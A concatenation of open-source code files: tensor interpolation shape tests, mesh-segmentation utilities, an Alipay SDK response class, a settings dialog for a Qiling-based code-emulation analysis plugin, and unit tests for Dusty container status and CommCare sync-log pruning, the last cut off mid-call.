44, 6050], [100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]), ([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]), ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]), ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]), ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]), ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349], [60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]) ]) def test_interpolate4_using_sizes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes): graph = build_graph(nodes_attrs=graph_nodes_attrs, edges=graph_edges, update_attributes={ 'input_data': {'shape': input_shape}, 'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)}, 'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)}, 'interpolate': {'pads_begin': int64_array(pads_begin), 'pads_end': int64_array(pads_end)} }) node = Node(graph, 'interpolate') tested_class = Interpolate(graph=graph, attrs=node.attrs()) tested_class.infer(node) msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \ " expected_shape={}, actual_shape={}" self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)), msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape, graph.node['interpolate_data']['shape'])) @generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [350, 150], [3.5, 150 / 200], [2, 3]), ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600], [8, 390, 600], [0.5, 390 / 200, 600 / 410], [0, 2, 3]), ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028], [56, 520], [4.0, 0.5], [0, 2]), ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380], [20, 40, 1380], [20.0, 40.0 / 85.0, 1380.0 / 690.0], [0, 2, 4]), ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345], [60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]), ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050], [100, 308, 4440, 44], [20.0, 4.0, 10.0, 0.5], [0, 1, 2, 3]), ([0], [0], [1, 100, 200], [1, 350, 150], [350, 150], [3.5, 150 / 200], [1, 2]), ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 390], [0.5, 390 / 200], [0, 2]), ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520], [4.0, 0.5], [0, 1]), ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0], [0, 1]), ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349], [60, 430, 345], [10.0, 4.3, 345.0 / 700.0], [0, 2, 4]), ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3], [60, 22, 430, 500, 345, 349, 1], [60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 1 / 3], [0, 2, 4, 6]), ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3], [60, 22, 430, 500, 345, 349, 1], [60, 430, 345, 1], [10.0, 4.3, 345.0 / 700.0, 0.3333333], [0, 2, 4, 6]), ]) def test_interpolate4_using_scales(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales, axes): graph = build_graph(nodes_attrs=graph_nodes_attrs, edges=graph_edges, update_attributes={ 'input_data': {'shape': input_shape}, 'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'axes': {'shape': int64_array(axes).shape, 'value': int64_array(axes)}, 'axes_data': {'shape': int64_array(axes).shape, 'value': int64_array(axes)}, 'interpolate': {'pads_begin': int64_array(pads_begin), 'pads_end': int64_array(pads_end), 'shape_calculation_mode': 'scales'} }) node = Node(graph, 'interpolate') tested_class = Interpolate(graph=graph, attrs=node.attrs()) tested_class.infer(node) msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}, axes={}," \ " expected_shape={}, actual_shape={}" self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)), msg.format(sizes, scales, pads_begin, pads_end, axes, output_shape, graph.node['interpolate_data']['shape'])) @generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]), ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600], [8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]), ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028], [56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]), ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380], [20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]), ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345], [60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]), ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050], [100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]), ([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]), ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]), ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]), ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]), ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349], [60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]), ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3], [60, 22, 430, 500, 345, 349, 1], [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]), ]) def test_interpolate4_using_sizes_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales): graph = build_graph(nodes_attrs=graph_node_attrs_without_axes, edges=graph_edges_without_axes, update_attributes={ 'input_data': {'shape': input_shape}, 'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'interpolate': {'pads_begin': int64_array(pads_begin), 'pads_end': int64_array(pads_end), 'shape_calculation_mode': 'sizes'} }) node = Node(graph, 'interpolate') tested_class = Interpolate(graph=graph, attrs=node.attrs()) tested_class.infer(node) msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \ " expected_shape={}, actual_shape={}" self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)), msg.format(sizes, scales, pads_begin, pads_end, output_shape, graph.node['interpolate_data']['shape'])) @generate(*[([0], [0], [1, 3, 100, 200], [1, 3, 350, 150], [1, 3, 350, 150], [1.0, 1.0, 3.5, 150 / 200]), ([0, 3, 10, 10], [0], [16, 7, 190, 400], [8, 10, 390, 600], [8, 10, 390, 600], [0.5, 1.0, 390 / 200, 600 / 410]), ([10, 5, 0, 10], [0, 4, 16, 18], [4, 33, 1024, 8000], [56, 42, 520, 8028], [56, 42, 520, 8028], [4.0, 1.0, 0.5, 1.0]), ([0], [0], [1, 16, 85, 470, 690], [20, 16, 40, 470, 1380], [20, 16, 40, 470, 1380], [20.0, 1.0, 40.0 / 85.0, 1.0, 1380.0 / 690.0]), ([4, 3, 11, 22, 5], [1, 3, 4, 8, 5], [1, 16, 85, 470, 690], [60, 22, 430, 500, 345], [60, 22, 430, 500, 345], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0]), ([0], [0], [5, 77, 444, 88, 6050], [100, 308, 4440, 44, 6050], [100, 308, 4440, 44, 6050], [20.0, 4.0, 10.0, 0.5, 1.0]), ([0], [0], [1, 100, 200], [1, 350, 150], [1, 350, 150], [1.0, 3.5, 150 / 200]), ([0, 3, 10], [0], [16, 7, 190], [8, 10, 390], [8, 10, 390], [0.5, 1.0, 390 / 200]), ([10, 0, 10], [0, 16, 18], [4, 1024, 8000], [56, 520, 8028], [56, 520, 8028], [4.0, 0.5, 1.0]), ([0], [0], [1, 690], [20, 1380], [20, 1380], [20.0, 1380.0 / 690.0]), ([4, 3, 11, 22, 5, 0], [1, 3, 4, 8, 5, 0], [1, 16, 85, 470, 690, 349], [60, 22, 430, 500, 345, 349], [60, 22, 430, 500, 345, 349], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0]), ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3], [60, 22, 430, 500, 345, 349, 1], [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 1 / 3]), ([4, 3, 11, 22, 5, 0, 0], [1, 3, 4, 8, 5, 0, 0], [1, 16, 85, 470, 690, 349, 3], [60, 22, 430, 500, 345, 349, 1], [60, 22, 430, 500, 345, 349, 1], [10.0, 1.0, 4.3, 1.0, 345.0 / 700.0, 1.0, 0.3333333]), ]) def test_interpolate4_using_scales_without_axes(self, pads_begin, pads_end, input_shape, output_shape, sizes, scales): graph = build_graph(nodes_attrs=graph_node_attrs_without_axes, edges=graph_edges_without_axes, update_attributes={ 'input_data': {'shape': input_shape}, 'sizes': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'sizes_data': {'shape': int64_array(sizes).shape, 'value': int64_array(sizes)}, 'scales': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'scales_data': {'shape': np.array(scales).shape, 'value': np.array(scales)}, 'interpolate': {'pads_begin': int64_array(pads_begin), 'pads_end': int64_array(pads_end), 'shape_calculation_mode': 'scales'} }) node = Node(graph, 'interpolate') tested_class = Interpolate(graph=graph, attrs=node.attrs()) tested_class.infer(node) msg = "Interpolate-4 infer failed for case: sizes={}, scales={}, pads_begin={}, pads_end={}," \ " expected_shape={}, actual_shape={}" self.assertTrue(np.array_equal(graph.node['interpolate_data']['shape'], int64_array(output_shape)), msg.format(sizes, scales, pads_begin, pads_end, output_shape, graph.node['interpolate_data']['shape']))
subdivnet/utils.py
565353780/jittor-subdivnet
145
12635739
<reponame>565353780/jittor-subdivnet import os import json from pathlib import Path import numpy as np import trimesh import jittor as jt from .mesh_tensor import MeshTensor segment_colors = np.array([ [0, 114, 189], [217, 83, 26], [238, 177, 32], [126, 47, 142], [117, 142, 48], [76, 190, 238], [162, 19, 48], [240, 166, 202], ]) def to_mesh_tensor(meshes): return MeshTensor(jt.int32(meshes['faces']), jt.float32(meshes['feats']), jt.int32(meshes['Fs'])) def save_results(mesh_infos, preds, labels, name): if not os.path.exists('results'): os.mkdir('results') if isinstance(labels, jt.Var): labels = labels.data results_path = Path('results') / name results_path.mkdir(parents=True, exist_ok=True) for i in range(preds.shape[0]): mesh_path = mesh_infos['mesh_paths'][i] mesh_name = Path(mesh_path).stem mesh = trimesh.load_mesh(mesh_path, process=False) mesh.visual.face_colors[:, :3] = segment_colors[preds[i, :mesh.faces.shape[0]]] mesh.export(results_path / f'pred-{mesh_name}.ply') mesh.visual.face_colors[:, :3] = segment_colors[labels[i, :mesh.faces.shape[0]]] mesh.export(results_path / f'gt-{mesh_name}.ply') def update_label_accuracy(preds, labels, acc): if isinstance(preds, jt.Var): preds = preds.data if isinstance(labels, jt.Var): labels = labels.data for i in range(preds.shape[0]): for k in range(len(acc)): if (labels[i] == k).sum() > 0: acc[k] += ((preds[i] == labels[i]) * (labels[i] == k)).sum() / (labels[i] == k).sum() def compute_original_accuracy(mesh_infos, preds, labels): if isinstance(preds, jt.Var): preds = preds.data if isinstance(labels, jt.Var): labels = labels.data accs = np.zeros(preds.shape[0]) for i in range(preds.shape[0]): raw_labels = mesh_infos['raw_labels'][i] raw_to_sub = mesh_infos['raw_to_sub'][i] accs[i] = np.mean((preds[i])[raw_to_sub] == raw_labels) return accs class ClassificationMajorityVoting: def __init__(self, nclass): self.votes = {} self.nclass = nclass def vote(self, mesh_paths, preds, labels): if isinstance(preds, jt.Var): preds = preds.data if isinstance(labels, jt.Var): labels = labels.data for i in range(preds.shape[0]): name = (Path(mesh_paths[i]).stem).split('-')[0] if not name in self.votes: self.votes[name] = { 'polls': np.zeros(self.nclass, dtype=int), 'label': labels[i] } self.votes[name]['polls'][preds[i]] += 1 def compute_accuracy(self): sum_acc = 0 for name, vote in self.votes.items(): pred = np.argmax(vote['polls']) sum_acc += pred == vote['label'] return sum_acc / len(self.votes) class SegmentationMajorityVoting: def __init__(self, nclass, name=''): self.votes = {} self.nclass = nclass self.name = name def vote(self, mesh_infos, preds, labels): if isinstance(preds, jt.Var): preds = preds.data if isinstance(labels, jt.Var): labels = labels.data for i in range(preds.shape[0]): name = (Path(mesh_infos['mesh_paths'][i]).stem)[:-4] nfaces = mesh_infos['raw_labels'][i].shape[0] if not name in self.votes: self.votes[name] = { 'polls': np.zeros((nfaces, self.nclass), dtype=int), 'label': mesh_infos['raw_labels'][i], 'raw_path': mesh_infos['raw_paths'][i], } polls = self.votes[name]['polls'] raw_to_sub = mesh_infos['raw_to_sub'][i] raw_pred = (preds[i])[raw_to_sub] polls[np.arange(nfaces), raw_pred] += 1 def compute_accuracy(self, save_results=False): if save_results: if self.name: results_path = Path('results') / self.name else: results_path = Path('results') results_path.mkdir(parents=True, exist_ok=True) sum_acc = 0 all_acc = {} for name, vote in self.votes.items(): label = vote['label'] pred = np.argmax(vote['polls'], axis=1) acc = np.mean(pred == label) sum_acc += acc all_acc[name] = acc if save_results: mesh_path = vote['raw_path'] mesh = trimesh.load_mesh(mesh_path, process=False) mesh.visual.face_colors[:, :3] = segment_colors[pred[:mesh.faces.shape[0]]] mesh.export(results_path / f'pred-{name}.ply') mesh.visual.face_colors[:, :3] = segment_colors[label[:mesh.faces.shape[0]]] mesh.export(results_path / f'gt-{name}.ply') if save_results: with open(results_path / 'acc.json', 'w') as f: json.dump(all_acc, f, indent=4) return sum_acc / len(self.votes)
alipay/aop/api/response/AlipayOpenAppAppcontentPoiSyncResponse.py
antopen/alipay-sdk-python-all
213
12635748
#!/usr/bin/env python # -*- coding: utf-8 -*- import json from alipay.aop.api.response.AlipayResponse import AlipayResponse class AlipayOpenAppAppcontentPoiSyncResponse(AlipayResponse): def __init__(self): super(AlipayOpenAppAppcontentPoiSyncResponse, self).__init__() self._alipay_poi_id = None @property def alipay_poi_id(self): return self._alipay_poi_id @alipay_poi_id.setter def alipay_poi_id(self, value): self._alipay_poi_id = value def parse_response_content(self, response_content): response = super(AlipayOpenAppAppcontentPoiSyncResponse, self).parse_response_content(response_content) if 'alipay_poi_id' in response: self.alipay_poi_id = response['alipay_poi_id']
plugins/Operations/Misc/emulate_code_dialog.py
nmantani/FileInsight-plugins
120
12635778
<filename>plugins/Operations/Misc/emulate_code_dialog.py # # Emulate code - Emulate selected region as an executable or shellcode # with Qiling Framework (the whole file if not selected) # # Copyright (c) 2020, <NAME> # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are met: # # 1. Redistributions of source code must retain the above copyright notice, # this list of conditions and the following disclaimer. # 2. Redistributions in binary form must reproduce the above copyright # notice, this list of conditions and the following disclaimer in the # documentation and/or other materials provided with the distribution. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS # IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, # THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR # PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR # CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, # EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, # PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; # OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, # WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR # OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF # ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. import re import sys import time import tkinter import tkinter.ttk import tkinter.messagebox # Print selected items def get_selection(r, ct, co, ca, ce, ea, t): print("%s\t%s\t%s\t%s\t%s\t%s" % (ct.get(), co.get(), ca.get().lower(), ce.get(), ea.get(), t.get()), end="") root.quit() def combo_arch_selected(r, ca, le, ce): # Hide / show endian combobox if ca.get() in ("ARM", "ARM64", "MIPS"): le.grid() ce.grid() else: ce.current(0) le.grid_remove() ce.grid_remove() def combo_type_selected(r, ct, la, ea): # Hide / show arguments entry if ct.get() == "Executable": la.grid() ea.grid() else: la.grid_remove() ea.grid_remove() def timeout_changed(*args): if not re.match("^-?([0-9])+$", timeout.get()): timeout.set("60") elif int(timeout.get()) < 0: timeout.set("0") # Create selection dialog root = tkinter.Tk() root.title("Emulate code") root.protocol("WM_DELETE_WINDOW", (lambda r=root: r.quit())) label_type = tkinter.Label(root, text="File type:") label_type.grid(row=0, column=0, padx=5, pady=5, sticky="w") combo_type = tkinter.ttk.Combobox(root, state="readonly") combo_type["values"] = ("Executable", "Shellcode") combo_type.current(0) combo_type.grid(row=0, column=2, padx=5, pady=5, sticky="w") label_os = tkinter.Label(root, text="OS:") label_os.grid(row=1, column=0, padx=5, pady=5, sticky="w") combo_os = tkinter.ttk.Combobox(root, state="readonly") combo_os["values"] = ("Windows", "Linux") # Currently macOS, UEFI and FreeBSD are excluded combo_os.current(0) combo_os.grid(row=1, column=2, padx=5, pady=5, sticky="w") label_arch = tkinter.Label(root, text="Architecture:") label_arch.grid(row=2, column=0, padx=5, pady=5, sticky="w") combo_arch = tkinter.ttk.Combobox(root, state="readonly") combo_arch["values"] = ("x64", "x86", "ARM", "ARM64", "MIPS") combo_arch.current(0) combo_arch.grid(row=2, column=2, padx=5, pady=5, sticky="w") label_endian = tkinter.Label(root, text="Big endian:") label_endian.grid(row=3, column=0, padx=5, pady=5, sticky="w") label_endian.grid_remove() combo_endian = tkinter.ttk.Combobox(root, state="readonly") combo_endian["values"] = ("False", "True") combo_endian.current(0) combo_endian.grid(row=3, column=2, padx=5, pady=5, sticky="w") combo_endian.grid_remove() label_args = tkinter.Label(root, text="Command line arguments:") label_args.grid(row=4, column=0, padx=5, pady=5, sticky="w") entry_args = tkinter.Entry(width=24) entry_args.grid(row=4, column=2, padx=5, pady=5, sticky="w") label_timeout = tkinter.Label(root, text="Emulation timeout\n(seconds, 0 = no timeout):", justify="left") label_timeout.grid(row=5, column=0, padx=5, pady=5, sticky="w") timeout = tkinter.StringVar() timeout.set("60") timeout.trace("w", timeout_changed) spin_timeout = tkinter.Spinbox(root, textvariable=timeout, width=4, from_=0, to=10000) spin_timeout.grid(row=5, column=2, padx=5, pady=5, sticky="w") button = tkinter.Button(root, text="OK", command=(lambda r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t))) button.grid(row=6, column=0, padx=5, pady=5, columnspan=3) button.focus() # Focus to this widget # Set callback functions combo_arch.bind('<<ComboboxSelected>>', lambda event, r=root, ca=combo_arch, le=label_endian, ce=combo_endian: combo_arch_selected(r, ca, le, ce)) combo_type.bind('<<ComboboxSelected>>', lambda event, r=root, ct=combo_type, la=label_args, ea=entry_args: combo_type_selected(r, ct, la, ea)) for x in (combo_type, combo_os, combo_arch, combo_endian, entry_args, spin_timeout, button): x.bind("<Return>", lambda event, r=root, ct=combo_type, co=combo_os, ca=combo_arch, ce=combo_endian, ea=entry_args, t=timeout: get_selection(r, ct, co, ca, ce, ea, t)) # Adjust window position sw = root.winfo_screenwidth() sh = root.winfo_screenheight() root.update_idletasks() # Necessary to get width and height of the window ww = root.winfo_width() wh = root.winfo_height() root.geometry('+%d+%d' % ((sw/2) - (ww/2), (sh/2) - (wh/2))) root.mainloop()
tests/unit/commands/status_test.py
gamechanger/dusty
421
12635796
from mock import patch, Mock, call from ...testcases import DustyTestCase from dusty.commands.status import _has_active_container, get_dusty_status from dusty.schemas.base_schema_class import DustySchema from ..utils import get_app_dusty_schema, get_bundle_dusty_schema, get_lib_dusty_schema class TestStatusCommands(DustyTestCase): @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_lib_active(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = ['some_container'] self.assertEquals(False, _has_active_container('lib', 'lib-a')) @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_lib_inactive(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = [] self.assertEquals(False, _has_active_container('lib', 'lib-a')) @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_app_active(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = ['some_container'] self.assertEquals(True, _has_active_container('app', 'app-a')) @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_app_inactive(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = [] self.assertEquals(False, _has_active_container('app', 'app-a')) @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_service_active(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = ['some_container'] self.assertEquals(True, _has_active_container('service', 'service-a')) @patch('dusty.commands.status.get_dusty_containers') def test_has_active_container_service_inactive(self, fake_get_dusty_containers): fake_get_dusty_containers.return_value = [] self.assertEquals(False, _has_active_container('service', 'service-a')) @patch('dusty.commands.status.docker_vm_is_running') @patch('dusty.systems.docker.get_docker_client') @patch('dusty.commands.status.PrettyTable') @patch('dusty.commands.status.get_dusty_containers') @patch('dusty.schemas.base_schema_class.get_specs_from_path') @patch('dusty.compiler.spec_assembler._get_referenced_apps') @patch('dusty.compiler.spec_assembler._get_referenced_libs') @patch('dusty.compiler.spec_assembler._get_referenced_services') def test_get_dusty_status_active_1(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs, fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running): fake_get_services.return_value = set(['ser1', 'ser2', 'ser3']) fake_get_libs.return_value = set(['lib1']) fake_get_apps.return_value = set(['app1', 'app2']) fake_table = Mock() fake_pretty_table.return_value = fake_table fake_get_dusty_containers.return_value = ['some_container'] fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')}, 'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')}, 'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')}, 'bundles': get_lib_dusty_schema({}, 'bundle')} fake_get_docker_client.return_value = None fake_vm_is_running.return_value = True get_dusty_status() call_args_list = fake_table.add_row.call_args_list self.assertTrue(call(['app1', 'app', 'X']) in call_args_list) self.assertTrue(call(['app2', 'app', 'X']) in call_args_list) self.assertTrue(call(['lib1', 'lib', '']) in call_args_list) self.assertTrue(call(['ser1', 'service', 'X']) in call_args_list) self.assertTrue(call(['ser2', 'service', 'X']) in call_args_list) self.assertTrue(call(['ser3', 'service', 'X']) in call_args_list) self.assertTrue(call(['dustyInternalNginx', '', 'X']) in call_args_list) self.assertEquals(len(call_args_list), 7) @patch('dusty.commands.status.docker_vm_is_running') @patch('dusty.systems.docker.get_docker_client') @patch('dusty.commands.status.PrettyTable') @patch('dusty.commands.status.get_dusty_containers') @patch('dusty.schemas.base_schema_class.get_specs_from_path') @patch('dusty.compiler.spec_assembler._get_referenced_apps') @patch('dusty.compiler.spec_assembler._get_referenced_libs') @patch('dusty.compiler.spec_assembler._get_referenced_services') def test_get_dusty_status_active_2(self, fake_get_services, fake_get_libs, fake_get_apps, fake_get_specs, fake_get_dusty_containers, fake_pretty_table, fake_get_docker_client, fake_vm_is_running): fake_get_services.return_value = set(['ser1', 'ser2', 'ser3']) fake_get_libs.return_value = set(['lib1']) fake_get_apps.return_value = set(['app1', 'app2']) fake_table = Mock() fake_pretty_table.return_value = fake_table fake_get_dusty_containers.return_value = [] fake_get_specs.return_value = {'apps': {'app1': get_app_dusty_schema({}, 'app1'), 'app2':get_app_dusty_schema({}, 'app2')}, 'libs': {'lib1': get_lib_dusty_schema({}, 'lib1')}, 'services': {'ser1': DustySchema(None, {}, 'ser1', 'services'), 'ser2': DustySchema(None, {}, 'ser2', 'services'), 'ser3': DustySchema(None, {}, 'ser3', 'services')}, 'bundles': get_lib_dusty_schema({}, 'bundle')} fake_get_docker_client.return_value = None fake_vm_is_running.return_value = True get_dusty_status() call_args_list = fake_table.add_row.call_args_list self.assertTrue(call(['app1', 'app', '']) in call_args_list) self.assertTrue(call(['app2', 'app', '']) in call_args_list) self.assertTrue(call(['lib1', 'lib', '']) in call_args_list) self.assertTrue(call(['ser1', 'service', '']) in call_args_list) self.assertTrue(call(['ser2', 'service', '']) in call_args_list) self.assertTrue(call(['ser3', 'service', '']) in call_args_list) self.assertTrue(call(['dustyInternalNginx', '', '']) in call_args_list) self.assertEquals(len(call_args_list), 7)
corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py
omari-funzone/commcare-hq
471
12635805
<filename>corehq/ex-submodules/casexml/apps/phone/tests/test_sync_purge.py import uuid from django.test import TestCase from testil import eq from casexml.apps.case.xml import V1 from casexml.apps.phone.exceptions import MissingSyncLog from casexml.apps.phone.models import get_alt_device_id from casexml.apps.phone.tests.utils import create_restore_user from casexml.apps.phone.utils import MockDevice from corehq.apps.app_manager.models import Application from corehq.apps.domain.models import Domain from corehq.apps.receiverwrapper.util import submit_form_locally from corehq.form_processor.tests.utils import FormProcessorTestUtils from corehq.form_processor.utils import get_simple_form_xml class TestSyncPurge(TestCase): @classmethod def setUpClass(cls): super(TestSyncPurge, cls).setUpClass() cls.domain = uuid.uuid4().hex cls.project = Domain(name=cls.domain) cls.project.save() cls.restore_user = create_restore_user(domain=cls.domain) cls.app = Application(domain=cls.domain) cls.app.save() @classmethod def tearDownClass(cls): FormProcessorTestUtils.delete_all_xforms(cls.domain) FormProcessorTestUtils.delete_all_sync_logs() cls.project.delete() super(TestSyncPurge, cls).tearDownClass() def test_prune_synclogs(self): device = MockDevice(self.project, self.restore_user) initial_sync = device.sync(items=True, version=V1, app=self.app) initial_synclog_id = initial_sync.restore_id self.assertIsNone(initial_sync.get_log().previous_log_id) # form submission success when there is no previous sync log form_xml = get_simple_form_xml(uuid.uuid4().hex) submit_form_locally(form_xml, self.domain, last_sync_token=initial_synclog_id) # more syncs second_sync = device.sync(version=V1, app=self.app) third_sync = device.sync(version=V1, app=self.app) # form submission should remove all previous syncs form_xml = get_simple_form_xml(uuid.uuid4().hex) submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id) third_synclog = third_sync.get_log() # re-fetch self.assertIsNone(third_synclog.previous_log_id) with self.assertRaises(MissingSyncLog): initial_sync.get_log() with self.assertRaises(MissingSyncLog): second_sync.get_log() # form submissions after purge don't fail form_xml = get_simple_form_xml(uuid.uuid4().hex) submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id) # restores after purge don't fail fourth_sync = device.sync(version=V1, app=self.app) response = fourth_sync.config.get_response() self.assertEqual(response.status_code, 200) def test_prune_formplayer_synclogs(self): device = MockDevice(self.project, self.restore_user) device.id = 'WebAppsLogin-' + device.id first_sync = device.sync() second_sync = device.sync() third_sync = device.sync() device2 = MockDevice(self.project, self.restore_user) device2.id = 'WebAppsLogin-' + device2.id other_sync = device2.sync() form_xml = get_simple_form_xml(uuid.uuid4().hex) submit_form_locally(form_xml, self.domain, last_sync_token=third_sync.restore_id) self.assertIsNone(third_sync.get_log().previous_log_id) with self.assertRaises(MissingSyncLog): first_sync.get_log() with self.assertRaises(MissingSyncLog): second_sync.get_log() # Other sync for same user but with different device ID is still there self.assertIsNotNone(other_sync.get_log()) # form submissions after purge don't fail form_xml = get_simple_form_xml(uuid.uuid4().hex) submit_form_locally(form_xml, self.domain, 